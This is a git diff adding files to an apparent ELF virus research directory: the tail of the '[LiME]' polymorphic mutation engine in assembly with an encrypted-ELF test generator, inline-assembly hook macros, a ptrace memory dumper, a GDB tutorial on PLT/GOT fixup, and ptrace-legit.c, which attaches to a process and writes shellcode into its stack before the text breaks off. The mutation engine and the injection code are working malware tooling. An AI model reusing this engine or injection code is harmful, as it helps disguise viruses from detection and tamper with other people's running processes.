+        call [ebp-@+LIME_rnd_eax_and_al]

+        or al,10h

+        pop edx

+        test dl,08h

+        pop edx

+        jnz lime_mtc8_a1

+        add eax,edx

+        jmp short lime_mtc8_a2

+lime_mtc8_a1:

+        xchg eax,edx

+        sub eax,edx

+lime_mtc8_a2:

+        stosd

+        call [ebp-@+LIME_make_noflags_cod]

+        mov al,[ebp-@+disp_reg]

+        mov [ebp-@+temp_reg],al

+        mov al,75h              ; jnz xx

+        stosw

+        cmp eax,edi

+        jp lime_mtc8_a3

+        pop eax

+        sub eax,edi

+        cmp eax,byte -80h

+        jb lime_mtc8_a4

+        mov [edi-01h],al

+        ret

+lime_mtc8_a3:

+        pop eax

+lime_mtc8_a4:   

+        push edi

+        call lime_rnd_trash

+        pop edx

+        mov eax,edi

+        sub eax,edx

+        mov [edx-01h],al

+        ret

+

+lime_mtc9:                      ; (add/or/adc/sbb/and/sub/xor/cmp) reg,reg

+        call [ebp-@+LIME_rnd]

+        and al,00111011b

+        stosb

+        call [ebp-@+LIME_rnd_reg]

+        or al,00011000b

+        rol al,3

+        mov ah,al

+        mov al,[edi-01h]

+        call [ebp-@+LIME_rnd_reg]

+        or al,ah

+        stosb

+        ret

+

+; ---------------------------------------------------------------

+

+LIME_END:

+LIME_SIZE equ LIME_END-LIME_BEGIN

+

+; ***************************************************************

+;  [LiME] test files generator

+; ***************************************************************

+

+main:

+        mov eax,4

+        mov ebx,1

+        mov ecx,gen_msg

+        mov edx,gen_msg_len

+        int 80h

+

+        mov ecx,99

+gen_l1:

+        push ecx

+

+        mov eax,8

+        mov ebx,filename

+        mov ecx,000111111101b   ; 000rwxrwxrwx

+        int 80h

+        

+        push eax

+        

+        mov eax,0

+        mov ebx,host_entry

+        mov ecx,host

+        mov edx,host_len

+        mov ebp,[e_entry]

+        call LIME

+        

+        pop ebx

+        

+        mov eax,4

+        mov ecx,elf_head

+        add edx,host_entry-elf_head

+        mov [p_filsz],edx

+        mov [p_memsz],edx

+        int 80h

+        

+        mov eax,6

+        int 80h

+        

+        lea ebx,[filename+1]

+        inc byte [ebx+1]

+        cmp byte [ebx+1],'9'

+        jbe gen_l2

+        inc byte [ebx]

+        mov byte [ebx+1],'0'

+gen_l2:

+        pop ecx

+        loop gen_l1

+

+        mov eax,1

+        xor ebx,ebx

+        int 80h

+        

+gen_msg db 'Generates 50 [LiME] encrypted test files...',0dh,0ah

+gen_msg_len equ $-gen_msg

+

+host:

+        call host_reloc

+host_reloc:

+        pop ecx

+        add ecx,host_msg-host_reloc

+        mov eax,4

+        mov ebx,1

+        mov edx,host_msg_len

+        int 80h

+        mov eax,1

+        xor ebx,ebx

+        int 80h

+

+host_msg db 'This is a [LiME] test file! ...('

+filename db 't00',0

+         db ')',0dh,0ah

+host_msg_len equ $-host_msg

+host_len equ $-host

+

+elf_head:

+e_ident db 7fh,'ELF',1,1,1

+        times 9 db 0

+e_type  dw 2

+e_mach  dw 3

+e_ver   dd 1

+e_entry dd host_entry-elf_head+08049000h

+e_phoff dd 34h

+e_shoff dd 0

+e_flags dd 0

+e_elfhs dw 34h

+e_phes  dw 20h

+e_phec  dw 01h

+e_shes  dw 0

+e_shec  dw 0

+e_shsn  dw 0    

+elf_ph:

+p_type  dd 1

+p_off   dd 0

+p_vaddr dd 08049000h

+p_paddr dd 08049000h

+p_filsz dd file_len

+p_memsz dd file_len

+p_flags dd 7

+p_align dd 1000h

+        times 20h db 0

+host_entry:

+        times 1024*4 db 0

+

+file_len equ $-elf_head

+

diff --git a/other/wrez/tmp/call.c b/other/wrez/tmp/call.c
new file mode 100644
index 0000000..d81f072
--- /dev/null
+++ b/other/wrez/tmp/call.c
@@ -0,0 +1,106 @@
+/* use ht on the 'call' executeable to set the first PT_LOAD rwx
+ * else it will segfault
+ */
+
+#include <stdio.h>
+
+int foofunc (void);
+
+
+#define FUNCPTR(dst,functionname) \
+{ \
+        register unsigned int   fptr; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "l0_%=: movl    $"##functionname", %%eax\n" \
+                "       subl    $l0_%=, %%eax\n" \
+                "       popl    %%edx\n" \
+                "       addl    %%edx, %%eax\n" \
+                : "=a" (fptr) : : "edx"); \
+        \
+        (dst) = (void *) fptr; \
+}
+
+#define PTRINSTALL(hook,chain) \
+{ \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "lr_%=: jmp     lo_%=\n" \
+                "l0_%=: pushl   %%edx\n" \
+                "       pushl   $0x64466226\n" \
+                "       jmpl    *%%eax\n" \
+                "lo_%=:\n" \
+                : : "a" (hook), "d" (chain)); \
+}
+
+#define PTRCONTROL(chain) \
+{ \
+        __asm__ __volatile__ ( \
+                "       jmp     l0_%=\n" \
+                "lp_%=: .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "\n" \
+                "l0_%=: call    l1_%=\n" \
+                "l1_%=: popl    %%edx\n" \
+                "       addl    $lp_%=, %%edx\n" \
+                "       subl    $l1_%=, %%edx\n" \
+                "\n" \
+                "       movl    0x4(%%ebp), %%eax\n" \
+                "       cmpl    $0x64466226, %%eax\n" \
+                "       jne     lo_%=\n" \
+                "\n" \
+                "       movl    0x8(%%ebp), %%eax\n" \
+                "       movl    %%eax, (%%edx)\n" \
+                "\n" \
+                "       movl    %%ebp, %%esp\n" \
+                "       popl    %%ebp\n" \
+                "       addl    $0x8, %%esp\n" \
+                "       ret\n" \
+                "\n" \
+                "lo_%=: movl    (%%edx), %%eax\n" \
+                : "=a" (chain) : : "edx"); \
+}
+
+
+int
+main (int argc, char *argv[])
+{
+        void (* addr)(void);
+
+#if 0
+        __asm__ __volatile__ ("
+                call    l1_%=
+        l1_%=:  movl    $foofunc, %%eax
+                subl    $l1_%=, %%eax
+                popl    %%edx
+                addl    %%edx, %%eax
+                pusha
+                call    *%%eax
+                popa"
+                : "=a" (addrdiff) : : "edx");
+#endif
+        FUNCPTR (addr, "foofunc");
+
+        printf ("0x%08lx\n", (unsigned long int) addr);
+
+        PTRINSTALL (addr, 0x42424242);
+
+        foofunc ();
+}
+
+
+int
+foofunc (void)
+{
+        void *  chain;
+
+        PTRCONTROL (chain);
+
+        printf ("0x%08lx\n", chain);
+}
+
+
+
diff --git a/other/wrez/tmp/call.c.backup b/other/wrez/tmp/call.c.backup
new file mode 100644
index 0000000..13d3565
--- /dev/null
+++ b/other/wrez/tmp/call.c.backup
@@ -0,0 +1,137 @@
+/* use ht on the 'call' executeable to set the first PT_LOAD rwx
+ * else it will segfault
+ */
+
+#include <stdio.h>
+
+int foofunc (void);
+
+
+#define FUNCPTR(dst,functionname) \
+{ \
+        register unsigned int   fptr; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "l0_%=: movl    $"##functionname", %%eax\n" \
+                "       subl    $l0_%=, %%eax\n" \
+                "       popl    %%edx\n" \
+                "       addl    %%edx, %%eax\n" \
+                : "=a" (fptr) : : "edx"); \
+        \
+        (dst) = (void *) fptr; \
+}
+
+#define PTRINSTALL(hook,chain) \
+{ \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "lr_%=: jmp     lo_%=\n" \
+                "l0_%=: pushl   %%edx\n" \
+                "       pushl   $0x64466226\n" \
+                "       jmpl    *%%eax\n" \
+                "lo_%=:\n" \
+                : : "a" (hook), "d" (chain)); \
+}
+
+#define PTRCONTROL(chain) \
+{ \
+        __asm__ __volatile__ ( \
+                "       jmp     l0_%=\n" \
+                "lp_%=: .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "       .byte   0x0\n" \
+                "\n" \
+                "l0_%=: call    l1_%=\n" \
+                "l1_%=: popl    %%edx\n" \
+                "       addl    $lp_%=, %%edx\n" \
+                "       subl    $l1_%=, %%edx\n" \
+                "\n" \
+                "       movl    0x4(%%ebp), %%eax\n" \
+                "       cmpl    $0x64466226, %%eax\n" \
+                "       jne     lo_%=\n" \
+                "\n" \
+                "       movl    0x8(%%ebp), %%eax\n" \
+                "       movl    %%eax, (%%edx)\n" \
+                "\n" \
+                "       movl    %%ebp, %%esp\n" \
+                "       popl    %%ebp\n" \
+                "       addl    $0x8, %%esp\n" \
+                "       ret\n" \
+                "\n" \
+                "lo_%=: movl    (%%edx), %%eax\n" \
+                : "=a" (chain) : : "edx"); \
+}
+
+int
+main (int argc, char *argv[])
+{
+        void (* addr)(void);
+
+#if 0
+        __asm__ __volatile__ ("
+                call    l1_%=
+        l1_%=:  movl    $foofunc, %%eax
+                subl    $l1_%=, %%eax
+                popl    %%edx
+                addl    %%edx, %%eax
+                pusha
+                call    *%%eax
+                popa"
+                : "=a" (addrdiff) : : "edx");
+#endif
+        FUNCPTR (addr, "foofunc");
+
+        printf ("0x%08lx\n", (unsigned long int) addr);
+
+        __asm__ __volatile__ ("
+                call    l0_%=
+        lr_%=:  jmp     lo_%=
+        l0_%=:  pushl   %%edx
+                pushl   $0x64466226
+                jmpl    *%%eax
+        lo_%=:
+        " : : "a" (addr), "d" (0x42424242));
+
+        foofunc ();
+}
+
+
+int
+foofunc (void)
+{
+        void *  chain;
+
+        __asm__ __volatile__ ("
+        ls1_%=: jmp     l0_%=
+        ptr_%=: .byte   0x0
+                .byte   0x0
+                .byte   0x0
+                .byte   0x0
+
+        l0_%=:  call    l1_%=
+        l1_%=:  popl    %%edx
+                addl    $ptr_%=, %%edx
+                subl    $l1_%=, %%edx
+
+                movl    0x4(%%ebp), %%eax
+                cmpl    $0x64466226, %%eax
+                jne     lo_%=
+
+                movl    0x8(%%ebp), %%eax
+                movl    %%eax, (%%edx)
+
+                movl    %%ebp, %%esp
+                popl    %%ebp
+                addl    $0x8, %%esp
+                ret
+
+        lo_%=:  movl    (%%edx), %%eax
+        " : "=a" (chain) : : "edx");
+
+        printf ("0x%08lx\n", chain);
+}
+
+
+
diff --git a/other/wrez/tmp/elf-runtime-fixup.txt b/other/wrez/tmp/elf-runtime-fixup.txt
new file mode 100644
index 0000000..a594cdd
--- /dev/null
+++ b/other/wrez/tmp/elf-runtime-fixup.txt
@@ -0,0 +1,324 @@
+
+**************************************************************************
+
+                        Reversing the ELF 
+                
+            Stepping with GDB during PLT uses and .GOT fixup
+                
+                     mayhem (mayhem@hert.org)
+
+**************************************************************************
+
+
+This text is a GDB tutorial about runtime process fixup using the Procedure
+Linkage Table section (.plt) and the Global Offset Table section (.got) . 
+If you dont know what is ELF, you should read the ELF ultimate documentation
+you can find here :
+
+        http://www.devhell.org/~mayhem/stuffs/ELF.pdf
+
+Some basic ASM knowledge may be requested . 
+
+This text has not been written for ELF specialists . This tutorial is an
+alternative , interactive way to understand the PLT mechanisms . 
+
+When the executable is mapped into memory, the core code segment _start
+fonction the  executable file is called as soon as the _dl_start function
+of the dynamic linker has returned . I will go step by step in the
+process structures initialization mechanims using objdump, gdb and gcc ;
+
+
+
+
+bash-2.03$ cat test.c
+int     called()
+{
+  puts("toto");
+}
+
+int     main()
+{
+  called();
+}
+bash-2.03$ cc test.c && objdump -D ./a.out | less
+
+<...>
+
+08048318 <_start>:
+ 8048318:       31 ed                   xor    %ebp,%ebp
+ 804831a:       5e                      pop    %esi
+ 804831b:       89 e1                   mov    %esp,%ecx
+ 804831d:       83 e4 f8                and    $0xfffffff8,%esp
+ 8048320:       50                      push   %eax
+ 8048321:       54                      push   %esp
+ 8048322:       52                      push   %edx
+ 8048323:       68 04 84 04 08          push   $0x8048404
+ 8048328:       68 98 82 04 08          push   $0x8048298
+ 804832d:       51                      push   %ecx
+ 804832e:       56                      push   %esi
+ 804832f:       68 c8 83 04 08          push   $0x80483c8
+ 8048334:       e8 cf ff ff ff          call   8048308 <_init+0x70>     <===
+ 8048339:       f4                      hlt    
+ 804833a:       90                      nop    
+ 804833b:       90                      nop    
+
+
+<...>
+
+
+
+
+Even if the dynamic linker creates some basic stuffs before everything, 
+he first core function called is _start .
+
+We can see that this function initialize the stack . Some things we have
+to notice :
+
+$0x8048404              : _fini() function offset in the .fini section 
+$0x8048298              : _init() function offset in the .init section 
+$0x80483c8              :  main() function offset in the .text section 
+
+
+This information is pushed because it's used in the libc in the 
+__libc_start_main function . This libc function has to :
+
+        - call the constructors .
+        - call the main .
+        - call the destructors .
+
+
+The call to the offset 0x8048308 points in the Procedure Linkage Table
+(.plt section) . This section provides a way to transfert inter-object 
+calls . Remember we're trying to call the __libc_start_main function . 
+
+The PLT code for this entry is :
+
+
+080482c8 <.plt>:
+ 80482c8:       ff 35 54 94 04 08       pushl  0x8049454
+ 80482ce:       ff 25 58 94 04 08       jmp    *0x8049458
+ 80482d4:       00 00                   add    %al,(%eax)
+ 80482d6:       00 00                   add    %al,(%eax)
+ 80482d8:       ff 25 5c 94 04 08       jmp    *0x804945c
+ 80482de:       68 00 00 00 00          push   $0x0
+ 80482e3:       e9 e0 ff ff ff          jmp    80482c8 <_init+0x30>
+ 80482e8:       ff 25 60 94 04 08       jmp    *0x8049460
+ 80482ee:       68 08 00 00 00          push   $0x8
+ 80482f3:       e9 d0 ff ff ff          jmp    80482c8 <_init+0x30>
+ 80482f8:       ff 25 64 94 04 08       jmp    *0x8049464
+ 80482fe:       68 10 00 00 00          push   $0x10
+ 8048303:       e9 c0 ff ff ff          jmp    80482c8 <_init+0x30>
+ 8048308:       ff 25 68 94 04 08       jmp    *0x8049468        *YOU ARE HERE*
+ 804830e:       68 18 00 00 00          push   $0x18
+ 8048313:       e9 b0 ff ff ff          jmp    80482c8 <_init+0x30>
+
+
+
+We can see that our call in the PLT is followed by a JMP :
+
+        jmp    *0x8049468
+
+The 0x8049468 offset is in the Global Offset Table (.got section) . The 
+stars means (for non x86 att syntax experts readers) that we are using
+the four byte pointer at 0x8049468 as an offset . This offset in actually
+retreivable from the Global Offset Table (GOT) . 
+
+In the beginning, the GOT offsets points on the following push (offset
+0x804830e : look at the objdump trace above) . At the moment , the GOT
+in our process is said to be "empty", and is going to be filled as long
+as the process calls remote functions (one entry is updated each time the
+program calls this remote function *for the first time*) .
+
+
+
+        .got :
+
+                         [00] 0x8049470                  [01] (nil)
+                         [02] (nil)                      [03] 0x80482de
+                         [04] 0x80482ee                  [05] 0x80482fe
+                         [06] 0x804830e                  [07] (nil)
+
+
+        The GOT is empty : every offsets point on a push instruction in
+        the procedure linkage table (.plt) . 
+
+
+
+We can see that the third first entries in the GOT have special values :
+
+        - The [0] entry contains the offset for the .dynamic section of
+        this object, it's used by the dynamic linker to know some
+        preferences and some very useful informations . Look at the
+        ELF reference for further details . Some stuff are also explained
+        in the dynamic linking related chapter of this tfile .
+
+        - The [1] one is the link_map structure offset associated with
+         this object, it's an internal structure in ld.so describing
+         a lot of interresting stuffs, I wont go in depth with it in this 
+         paper .        
+
+        - The [2] entry contains the runtime process fixup function offset
+        (pointing in the dynamic linking code zone). This pointer is used by
+        the first entry of the plt which is called when you want to launch
+        a remote (undefined) function for the first time .
+
+
+The 2nd and 3rd entries are set to NULL at the beginning and are filled by
+the dynamic linker before the process code segment starting function takes
+control . These are filled in elf_machine_runtime_setup() in 
+sysdeps/i386/dl-machine.h .
+
+With that mechanism, we have to execute three call instructions (if the
+corresponding GOT entry has not been updated yet), or two call instructions
+(if the GOT has been filled) . Remember that the GOT has been filled during
+the first call on the corresponding function . Only external functions need
+that mechanism, since only in-core code segment functions offsets are known 
+before the process start (the executable object base address is known) . 
+
+
+Get back to our code, we can see that this entry jumps to the 3rd offset of
+the GOT entry, it means that the code calls the dynamic linker's resolution
+function dl-resolve() . Some other papers have been describing useful
+information gathering with it (check Nergal's phrack 58 or grugq's subversive
+dynamic linking paper)
+
+
+We can note that these 2 offsets are pushed each time a call is done via 
+the PLT :
+
+  - The first is an offset (in octets) in the .rel.plt section of the
+    program binary . It's used to identify the corresponding symbol for
+    the function we are trying to get the real absolute address .
+  - The second one is the offset contained in the 2nd GOT entry
+    (it's 0x8049454 in our code) .
+
+This information allows us to identify the symbol for which we want to do
+a relocation . Let's discover the runtime .got fixup offset with gdb and 
+the procfs :
+
+
+bash-2.03$ gdb a.out
+
+(gdb) b called
+Breakpoint 1 at 0x80483b7
+
+(gdb) r
+Starting program: /home/mayhem/a.out
+Breakpoint 1, 0x80483b7 in called ()
+
+(gdb) disassemble called
+Dump of assembler code for function called:
+0x80483b4 <called>:     push   %ebp
+0x80483b5 <called+1>:   mov    %esp,%ebp
+0x80483b7 <called+3>:   push   $0x8048428
+0x80483bc <called+8>:   call   0x80482e8 <puts>      <======== LOOK HERE !
+0x80483c1 <called+13>:  add    $0x4,%esp
+0x80483c4 <called+16>:  leave  
+0x80483c5 <called+17>:  ret   
+0x80483c6 <called+18>:  mov    %esi,%esi
+End of assembler dump.
+
+
+What is this routine ?
+
+
+
+(gdb) x/3i 0x80482e8
+0x80482e8 <puts>:       jmp    *0x8049460
+0x80482ee <puts+6>:     push   $0x8
+0x80482f3 <puts+11>:    jmp    0x80482c8 <_init+48>
+
+
+It's the procedure linkage table entry for this function, it uses offset
+in the GOT . As the GOT is not yet filled, the offset is the 32 bits address
+of the following push ("push $0x8") . This entry is going to be modified
+by the dynamic linker as soon as the symbol resolution is done ( see 
+chapter 2) .
+
+
+
+(gdb) x/1x 0x8049460
+0x8049460 <_GLOBAL_OFFSET_TABLE_+16>:   0x080482ee
+
+
+Each first time you call a remote function, the PLT first entry code
+is executed :
+
+
+(gdb) x/3i 0x80482c8
+0x80482c8 <_init+48>:   pushl  0x8049454
+0x80482ce <_init+54>:   jmp    *0x8049458
+0x80482d4 <_init+60>:   add    %al,(%eax)
+
+
+This first entry uses the third entry of the GOT , then the dynamic
+linker takes control :
+
+
+(gdb) x/1x 0x8049458    
+0x8049458 <_GLOBAL_OFFSET_TABLE_+8>:    0x40009a10
+
+(gdb) 
+
+
+Let's see what is the library containing this function at the offset
+0x40009a10 .
+
+
+bash-2.04$ pidof a.out
+7905
+bash-2.04$ cat /proc/7905/maps            
+08048000-08049000 r-xp 00000000 03:01 135375  /home/mayhem/a.out
+08049000-0804a000 rw-p 00000000 03:01 135375  /home/mayhem/a.out
+40000000-40012000 r-xp 00000000 03:01 229408  /lib/ld-2.1.2.so   <== *GOOD*
+40012000-40013000 rw-p 00011000 03:01 229408  /lib/ld-2.1.2.so
+40013000-40014000 rw-p 00000000 00:00 0
+4001a000-400fb000 r-xp 00000000 03:01 229410  /lib/libc-2.1.2.so
+400fb000-400ff000 rw-p 000e0000 03:01 229410  /lib/libc-2.1.2.so
+400ff000-40102000 rw-p 00000000 00:00 0
+bfffe000-c0000000 rwxp fffff000 00:00 0
+bash-2.04$ 
+
+
+The wanted function is in the dynamic linker code segment, more precisely
+in the _dl_runtime_fixup() function, in the sysdeps/i386/dl-machine.h
+file . To be honest, i had difficulties to find it , because I could not
+deduce the symbol giving its virtual address, and this for 2 reasons :
+
+        - The libc and the dynamic linker are stripped (the symbol table
+        and the debug information has been removed) . As a consequence, 
+        I could get the function name from the symbol table .
+
+        - In a shared library, offsets are relative (actually it's
+        calculated from the beginning of the file, so you can't retreive
+        the absolute function addresses from the ld.so symbol table) . 
+        You can do a "objdump -D /lib/libc.so.6" to see it by yourself . 
+
+        Even if I had a symbol table, I could not have got the good offset .
+        I could have compare the first bytes of the function in the debugged
+        process and the library (ld.so) code segment to find some hexadecimal
+        sequences matching, but I prefered to read the sources . ;)
+
+        The solution is to calculate the relocation ourself, most of the 
+        time we have : base_addr + symbol_value = runtime address . You
+        can get the base address from the procfs (if you have read access,
+        this is okay by default) and you can check the symbol's value
+        from the library's .dynsym section (list of exported symbols). 
+        Note that you can retreive it from the symbol table (.symtab)
+        but this section may be removed from the shared library using
+        known basic tools like strip(3) .
+
+
+Shoutouts to silvio and grugq !
+
+
+*EOF*
+
+
+
+
+
+
+
+
+
diff --git a/other/wrez/tmp/foo.c b/other/wrez/tmp/foo.c
new file mode 100644
index 0000000..51d4bd2
--- /dev/null
+++ b/other/wrez/tmp/foo.c
@@ -0,0 +1,11 @@
+
+#include <stdio.h>
+
+int
+main (int argc, char *argv[])
+{
+        printf ("my home is my castle\n");
+        printf ("my castle is my home\n");
+}
+
+
diff --git a/other/wrez/tmp/memdump.c b/other/wrez/tmp/memdump.c
new file mode 100644
index 0000000..3215d20
--- /dev/null
+++ b/other/wrez/tmp/memdump.c
@@ -0,0 +1,249 @@
+/* memory dump utility
+ * -scut
+ */
+
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <libgen.h>     /* basename */
+
+
+void
+hexdump (unsigned char *data, unsigned int amount);
+
+
+int
+main (int argc, char *argv[])
+{
+        pid_t                   fpid;           /* child pid, gets ptraced */
+        char *                  argv0;
+        struct user             regs;           /* PTRACE pulled registers */
+        unsigned long int       addr,           /* segment start address */
+                                addr_end,       /* segment end address */
+                                len;            /* length of segment */
+        unsigned long int       addr_walker,    /* walker to dump memory */
+                                eip;            /* current childs eip */
+
+        /* array to temporarily store data into */
+        unsigned char           data_saved[sizeof (unsigned long int)];
+
+        /* file to read mapping information */
+        FILE *                  map_f;          /* /proc/<pid>/maps stream */
+        unsigned char           map_line[256];  /* one line each from map */
+
+        /* data for the dump files */
+        FILE *                  dump_f;         /* stream */
+        char                    dump_name[64];  /* filename buffer */
+
+
+        if (argc < 3 || sscanf (argv[1], "0x%lx", &eip) != 1) {
+                printf ("usage: %s <eip> <argv0 [argv1 [...]]>\n\n", argv[0]);
+                printf ("will run 'argv0' as program with given arguments, "
+                                "until 'eip' is reached, then\n"
+                        "dumping 'len' bytes from 'addr'.\n\n"
+                        "example: %s 0x08049014 0x08048000 0x100 /bin/ls "
+                                "-l\n\n", argv[0]);
+
+                exit (EXIT_FAILURE);
+        }
+
+        argv0 = argv[2];
+
+        fpid = fork ();
+        if (fpid < 0) {
+                perror ("fork");
+                exit (EXIT_FAILURE);
+        }
+        if (fpid == 0) {        /* child */
+                if (ptrace (PTRACE_TRACEME, 0, NULL, NULL) != 0) {
+                        perror ("ptrace PTRACE_TRACEME");
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "  child: TRACEME set\n");
+
+                fprintf (stderr, "  child: executing: %s\n", argv[2]);
+                close (1);
+                dup2 (2, 1);
+                execve (argv[2], &argv[2], NULL);
+
+                /* failed ? */
+                perror ("execve");
+                exit (EXIT_FAILURE);
+        }
+
+        wait (NULL);
+
+        memset (&regs, 0, sizeof (regs));
+
+        if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (stderr, "[0x%08lx] first stop\n", regs.regs.eip);
+
+        /* now single step until given eip is reached */
+        do {
+                if (ptrace (PTRACE_SINGLESTEP, fpid, NULL, NULL) < 0) {
+                        perror ("ptrace PTRACE_SINGLESTEP");
+                        exit (EXIT_FAILURE);
+                }
+                wait (NULL);
+
+                memset (&regs, 0, sizeof (regs));
+                if (ptrace (PTRACE_GETREGS, fpid, NULL, &regs) < 0) {
+                        perror ("ptrace PTRACE_GETREGS");
+                        exit (EXIT_FAILURE);
+                }
+        } while (regs.regs.eip != eip);
+
+        fprintf (stderr, "MEMDUMP: eip @ 0x%08lx, dumping...\n", eip);
+
+        snprintf (dump_name, sizeof (dump_name), "%s.regs",
+                basename (argv0));
+        dump_name[sizeof (dump_name) - 1] = '\0';
+        dump_f = fopen (dump_name, "w");
+        if (dump_f == NULL) {
+                perror ("fopen dumpfile regs");
+                exit (EXIT_FAILURE);
+        }
+        fprintf (dump_f, "eax = 0x%08lx\n", regs.regs.eax);
+        fprintf (dump_f, "ebx = 0x%08lx\n", regs.regs.ebx);
+        fprintf (dump_f, "ecx = 0x%08lx\n", regs.regs.ecx);
+        fprintf (dump_f, "edx = 0x%08lx\n", regs.regs.edx);
+        fprintf (dump_f, "esi = 0x%08lx\n", regs.regs.esi);
+        fprintf (dump_f, "edi = 0x%08lx\n", regs.regs.edi);
+        fprintf (dump_f, "ebp = 0x%08lx\n", regs.regs.ebp);
+        fprintf (dump_f, "esp = 0x%08lx\n", regs.regs.esp);
+        fprintf (dump_f, "eflags = 0x%08lx\n", regs.regs.eflags);
+        fprintf (dump_f, "xcs = 0x%08lx\n", regs.regs.xcs);
+        fprintf (dump_f, "xds = 0x%08lx\n", regs.regs.xds);
+        fprintf (dump_f, "xes = 0x%08lx\n", regs.regs.xes);
+        fprintf (dump_f, "xss = 0x%08lx\n", regs.regs.xss);
+        fclose (dump_f);
+
+        snprintf (map_line, sizeof (map_line), "/proc/%d/maps", fpid);
+        map_line[sizeof (map_line) -  1] = '\0';
+        map_f = fopen (map_line, "r");
+        if (map_f == NULL) {
+                perror ("fopen map-file");
+
+                exit (EXIT_FAILURE);
+        }
+
+        while (fgets (map_line, sizeof (map_line), map_f) != NULL) {
+                char            map_perm[8];
+
+                if (sscanf (map_line, "%08lx-%08lx %7[rwxp-] ",
+                        &addr, &addr_end, map_perm) != 3)
+                {
+                        perror ("invalid map-line");
+
+                        exit (EXIT_FAILURE);
+                }
+                if (addr_end < addr) {
+                        fprintf (stderr, "sanity required, not so: "
+                                "addr = 0x%08lx, addr_end = 0x%08lx",
+                                addr, addr_end);
+
+                        exit (EXIT_FAILURE);
+                }
+                len = addr_end - addr;
+                map_perm[sizeof (map_perm) - 1] = '\0'; /* ;-) */
+
+                fprintf (stderr, "MEMDUMP: -> 0x%08lx (0x%08lx bytes, "
+                        "perm %s)\n", addr, len, map_perm);
+
+                snprintf (dump_name, sizeof (dump_name),
+                        "%s.0x%08lx.0x%08lx.%s",
+                        basename (argv0), addr, len, map_perm);
+                dump_name[sizeof (dump_name) - 1] = '\0';
+                dump_f = fopen (dump_name, "wb");
+                if (dump_f == NULL) {
+                        perror ("fopen dumpfile");
+
+                        exit (EXIT_FAILURE);
+                }
+
+                /* save data, assuming addr is page aligned */
+                for (addr_walker = 0 ; addr_walker < len ;
+                        addr_walker += sizeof (data_saved))
+                {
+                        errno = 0;
+
+                        *((unsigned long int *) &data_saved[0]) =
+                                ptrace (PTRACE_PEEKDATA, fpid,
+                                        addr + addr_walker, NULL);
+
+                        if (errno == 0 && fwrite (&data_saved[0], 1, 4,
+                                dump_f) != 4)
+                        {
+                                perror ("fwrite dumpfile");
+
+                                exit (EXIT_FAILURE);
+                        } else if (errno != 0) {
+                                fprintf (stderr,
+                                        "[0x%08lx] invalid PTRACE_PEEKDATA\n",
+                                        addr + addr_walker);
+
+                                exit (EXIT_FAILURE);
+                        }
+                }
+
+                fclose (dump_f);
+        }
+        fclose (map_f);
+
+        if (ptrace (PTRACE_DETACH, fpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+
+        fprintf (stderr, "MEMDUMP: success. terminating.\n");
+        exit (EXIT_SUCCESS);
+}
+
+
+
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+
+        return;
+}
diff --git a/other/wrez/tmp/ptrace-legit.c b/other/wrez/tmp/ptrace-legit.c
new file mode 100644
index 0000000..a6c53d7
--- /dev/null
+++ b/other/wrez/tmp/ptrace-legit.c
@@ -0,0 +1,143 @@
+/* -scutstyle */
+
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+void
+hexdump (unsigned char *data, unsigned int amount);
+
+unsigned char   shellcode[] = "\x90\x90\xcc\x73";
+
+int
+main (int argc, char *argv[])
+{
+        pid_t                   cpid;
+        struct user             regs;
+        unsigned long int       safed_eip;
+        unsigned long int       addr,
+                                addr_walker;
+        unsigned char           data_saved[256];
+
+
+#if 1
+        if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) {
+                printf ("usage: %s <pid>\n", argv[0]);
+                exit (EXIT_FAILURE);
+        }
+#else
+        cpid = getppid();
+#endif
+
+        printf ("pid = %d\n", cpid);
+
+        printf ("exploiting\n\n");
+
+        if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace");
+                exit (EXIT_FAILURE);
+        }
+
+        /* save data */
+        addr = 0xbffff010;
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
+                        addr + addr_walker, NULL);
+        }
+        hexdump (data_saved, sizeof (data_saved));
+
+        /* write */
+        for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
+                ++addr_walker)
+        {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        shellcode[addr_walker] & 0xff);
+        }
+
